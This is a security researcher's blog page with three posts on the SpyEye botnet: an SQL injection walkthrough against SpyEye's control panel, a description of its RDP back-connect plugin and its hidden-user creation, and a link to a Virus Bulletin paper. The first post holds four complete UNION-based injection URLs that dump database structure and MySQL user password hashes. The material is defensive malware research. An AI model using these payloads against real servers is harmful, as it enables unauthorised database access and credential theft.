Wednesday, August 31, 2011

Blasting SpyEye C&C - SQL Injection Wins

The world has changed dramatically with the evolution of malware. A similar set of vulnerabilities ( web attacks specific) such as SQL injection can be used to compromise the malware driven server. Some time ago, we talked about Blind SQL Injection in SpyEye Version 1.0 in which we presented about the vulnerability in the SpyEye code. Since then we dint get the time to present it as a complete case study. In this post, we are going to talk about the step by step approach to compromise the SpyEye database server. One can do lot of different attacks such as Local File Inclusion (LFI) there by reading the configuration credentials. However, we are sticking to the SQL injection to show how well we can inject and take control of malware server.

The vulnerability affects the latest version of spyeye (1.3) within "frmcp0/frm_findrep_sub2.php?id=". The good point is this SQL injection works right on the fly without any authentication.

Injection 1: Version Disclosure - http://spyeye_domain.com/frmcp /frm_findrep_sub2.php?id=-999999%20union%20all%20select%200x31,concat(0x7e,0x27,version()
,0x27,0x7e),0x33,0x34,0x35,0x36,0x37--+




You can see the injection is occurring in the title field. This suggests that our payload is getting injected. On similar testing pattern, let's perform some other set of injections as presented below

Injection 2: Database Verification - http://spyeye_domain.com/frmcp0/frm_findrep_sub2.php?id=-999999%20union%20all%20select%200x31,concat(0x7e,
0x27,database(),0x27,0x7e),0x33,0x34,0x35,0x36,0x37--+




Injection 3: Information Schema Disclosure -
http://spyeye_domain.com/frmcp0/frm_findrep_sub2.php?id=-999999 union all select 0x31,concat(0x7e,0x27,group_concat(column_name),0x27,0x7e),0x33,0x34,0x35,0x36,0x37 from `information_schema`.columns where table_schema=0x6d7973716c and table_name=0x75736572--+


The disclosed schema is as follows

Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,
Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,
Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,
Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,
Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,
Alter_routine_priv,Create_user_priv,ssl_type,ssl_cipher,x509_issuer,
x509_subject,max_questions,max_updates,max_connections,max_user_connections


Injection 4: Pwning MySQL Database - http://spyeye_domain.com/frmcp0/frm_findrep_sub2.php?id=-999999 union all select 0x31,concat(0x7e,0x27,user.User,0x3a,user.Host,0x3a,user.Password,0x27,0x7e)
,0x33,0x34,0x35,0x36,0x37 from `mysql`.user limit 0,1--+




So this discussion has proved the fact that security vulnerabilities can be fruitful in hunting back malware. We will be giving a detailed talk on Hunting Web Malware at OWASP and Hacker Halted this year.

OWASP AppSec USA - http://www.appsecusa.org/talks.html#goodhacker

Hacker Halted : http://www.hackerhalted.com/2011/Presenters.aspx


Stay tuned.

Sunday, August 7, 2011

SpyEye - RDP BackConnect Plugin and Total Commander

Well, malware has many facets and there is no doubt in that. In this post, we are going to raise a point about the SpyEye RDP back-connect plugin and its working. During out talk at Hack In The Box (HITB) - AMS, we presented about the details of SpyEye botnet and its ability to work with modular plugins. The RDP plugin in SpyEye works on the same benchmarks as FTP and SOCKS.

Generally, the bot is compiled up with different plugins. The RDP plugin starts a dynamic server on the client machine where the bot is installed. From the victim machine, the bot connects back to main server over RDP. The plugin is well equipped enough to create a hidden user in the victim machine and this account is used to for back server connections. However, this plugin is good enough to allow the remote command server to execute commands on victim machine using RDP.

In addition, the SpyEye bot downloads the portable version of Total Commander from the internet and execute it in the memory on the fly. The beauty of this plugin is that it does not require any system restart when Total Commander is downloaded and installed into the victim machine.



The plugin requires following environmental variables in order to specify the required information for plugin execution

%IP_OF_BC_SERVER%
%PORT_OF_BC_SERVER%
%MAGIC_CODE%
%WINDOWS_LOGIN%
%WINDOWS_PASSWORD%
%URL_TO_PORTABLE_TCMD%


The connection to the bot can be performed using standard Windows tool mstsc.exe Remote Desktop Connection:. It has also been observed that this plugin support only x86 OS and not x64 architectures. In the coming time, hopefully this will be released too.

Tuesday, August 2, 2011

Virus Bulletin - SpyEye Exploitation Tactics

As a follow-up to our article on the SpyEye malware infection framework, we are discussing the SpyEye bot and the tactics it uses for stealing information from victim machines.

Fetch the paper from here : http://www.virusbtn.com/virusbulletin/archive/2011/08/vb201108-spyeye

Right now available for subscribers only.